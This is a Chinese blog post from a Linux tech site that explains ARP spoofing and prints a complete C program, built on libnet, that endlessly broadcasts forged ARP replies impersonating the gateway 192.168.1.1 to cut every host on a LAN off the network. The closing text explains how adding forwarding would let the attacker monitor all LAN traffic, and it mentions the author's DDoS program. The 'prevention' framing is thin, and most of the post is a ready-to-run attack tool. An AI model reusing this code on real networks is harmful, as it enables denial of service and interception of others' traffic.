Linux使用libnet实现ARP攻击脚本原理分析以防被攻击

 更新时间:2013年11月28日 15:38:26   作者:  
这篇文章主要介绍了Linux使用libnet实现ARP攻击脚本分析,大家可以参考预防这样的攻击

闲来无事,用libnet写了个简单的ARP攻击。以前感觉ARP攻击不是特别常见,不过最近工作中倒是遇到过两次ARP欺骗的事件。其实ARP欺骗的原理灰常简单滴,大部分都是在局域网中发送伪造的ARP广播包, 广播包的目的是干嘛呢?很简单,欺骗内网的所有主机,告诉受害主机,“我”是网关。 内网机器接收到这种广播包之后,会刷新自己ARP缓存表,把网关的IP和广播包中的源MAC绑定。这样攻击机器就达到了冒充网关的目的。
上次一所大学就是被ARP欺骗攻击,他们的学校主页一打开就会跳出其他很多乱七八糟的页面,,,,当时查看他们WEB服务器的源代码,发现没有被插入这些<iframe>会弹页面的代码,但是用浏览器外网访问的时候,这些代码就出现了,很明显网站的返回的客户端数据在途中被劫持修改了(插入了一些代码)。

下面实现的就比较简单了,只做欺骗,不做转发,导致的后果就是局域网所有主机会断网。测试了一下,内网主机会无法上网,安了360ARP防护的会报警,能上网,就是网速有点慢,但是识别出了的攻击主机好像不准确,试了几次都识别成正常的电脑在攻击,不知道360这个识别是不是通过源MAC地址识别还是怎么识别。

复制代码 代码如下:

#include "arp.h"

int main(int argc,char **argv){
 libnet_t *l;
 int i,packet_size;  //发送的数据包的长度
 libnet_ptag_t arp_tag,ether_tag;
 char *device="eth0";
 char err_buf[LIBNET_ERRBUF_SIZE];
 char *destion_ip_str = "255.255.255.255";
 char *source_ip_str = "192.168.1.1";
 u_char source_hardware[6]={0x00,0x0c,0x29,0x68,0x95,0x84};
 u_char destion_hardware[6]={0xff,0xff,0xff,0xff,0xff,0xff};
 u_int32_t source_ip,destion_ip;
 //将字符形式ip转换为网络字节序
 source_ip = libnet_name2addr4(l,source_ip_str,LIBNET_RESOLVE);
 destion_ip = libnet_name2addr4(l,destion_ip_str,LIBNET_RESOLVE);
 //初始化libnet句柄
 l = libnet_init(LIBNET_LINK,device,err_buf);
 if(l == NULL){
  printf("初始化libnet句柄失败:%s\n",err_buf);
  exit(-1);
 }
 arp_tag = libnet_build_arp(
  ARPHRD_ETHER,  //硬件地址类型,此处为以太网类型
  ETHERTYPE_IP,  //协议地址类型
  6,
  4,
  ARPOP_REPLY,  //ARP应答
  source_hardware,
  (u_int8_t *)&source_ip,
  destion_hardware,
  (u_int8_t *)&destion_ip,
  NULL,  //无负载
  0,   //负载长度为0
  l,
  0  //协议块标记,为0,表示新建协议块
  );
 ether_tag = libnet_build_ethernet(
  (u_int8_t *)&destion_hardware,
  (u_int8_t *)&source_hardware,
  ETHERTYPE_ARP,
  NULL,
  0,
  l,
  0
  );
 i = 0;
 while(1){
  packet_size = libnet_write(l);  //发送构造的ARP数据包
  usleep(10);
  i++;
 }
 printf("数据包长度为:%d\n",packet_size);
 libnet_destroy(l);
 return 0;
}

目标MAC为广播地址,全0xff就行,源MAC地址可以为本机MAC或者随便伪造的MAC(在程序中获取本机MAC可用ioctl函数,最近在写DDOS攻击程序就是用ioctl获取本机MAC和IP的),注意ARP包类型为ARPOP_REPLY(应答包)。
如果不想弄断网,只进行欺骗的话,数据发送过来之后,要进行转发到正确的网关,这样就保证内网网络正常,而且所有数据都被监听了

相关文章

  • 浅谈Linux中的chattr与lsattr命令

    浅谈Linux中的chattr与lsattr命令

    下面小编就为大家带来一篇浅谈Linux中的chattr与lsattr命令。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
    2016-12-12
  • Ubuntu服务器常用命令汇总

    Ubuntu服务器常用命令汇总

    ubunt常用服务器命令操作,闲来无事,分享ubuntu服务器版常用命令,绝对有用。希望大家好好享受,但是不要拿自己的服务器做测试,建议您在windows下建立虚拟机再操作
    2020-10-10
  • 在Ubuntu 16.04 Server上安装Zabbix的方法

    在Ubuntu 16.04 Server上安装Zabbix的方法

    这篇文章主要介绍了在Ubuntu 16.04 Server上安装Zabbix的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
    2018-03-03
  • Ubuntu18.04安装Python虚拟环境

    Ubuntu18.04安装Python虚拟环境

    这篇文章主要介绍了Ubuntu18.04安装Python虚拟环境的相关知识,非常不错,具有一定的参考借鉴价值,需要的朋友可以参考下
    2018-10-10
  • LNMP系列教程之 设置301重定向的方法

    LNMP系列教程之 设置301重定向的方法

    因为LNMP系统环境采用的是Nginx而不是Apache,所以在设置301重定向的时候,不是简单的在根目录.htaccess文件添加代码就可以实现,因为他需要对单独的网站conf文件进行修改配置
    2012-09-09
  • Linux 相对路径和绝对路径的使用

    Linux 相对路径和绝对路径的使用

    这篇文章主要介绍了Linux 相对路径和绝对路径的使用,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
    2020-02-02
  • Ubuntu下查看ssh服务是否安装或启动的方法

    Ubuntu下查看ssh服务是否安装或启动的方法

    这篇文章主要介绍了Ubuntu下查看ssh服务是否安装或启动的方法,文中给出了详细的方法示例,对大家具有一定的参考借鉴价值,有需要的朋友们下面来一起看看吧。
    2017-01-01
  • linux No space left on device由索引节点(inode)爆满引发500问题

    linux No space left on device由索引节点(inode)爆满引发500问题

    这篇文章主要介绍了linux No space left on device由索引节点(inode)爆满引发500问题,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
    2019-11-11
  • 在Linux下修改和重置root密码的方法(超简单)

    在Linux下修改和重置root密码的方法(超简单)

    对于linux新手来说,很容易把root的密码忘记,今天脚本之家小编给大家带来了在Linux下修改和重置root密码的方法,感兴趣的朋友一起看看吧
    2018-05-05
  • 详解负载均衡实现一个域名对应多个IP地址

    详解负载均衡实现一个域名对应多个IP地址

    这篇文章主要介绍了详解负载均衡实现一个域名对应多个IP地址的相关资料,需要的朋友可以参考下
    2017-05-05

最新评论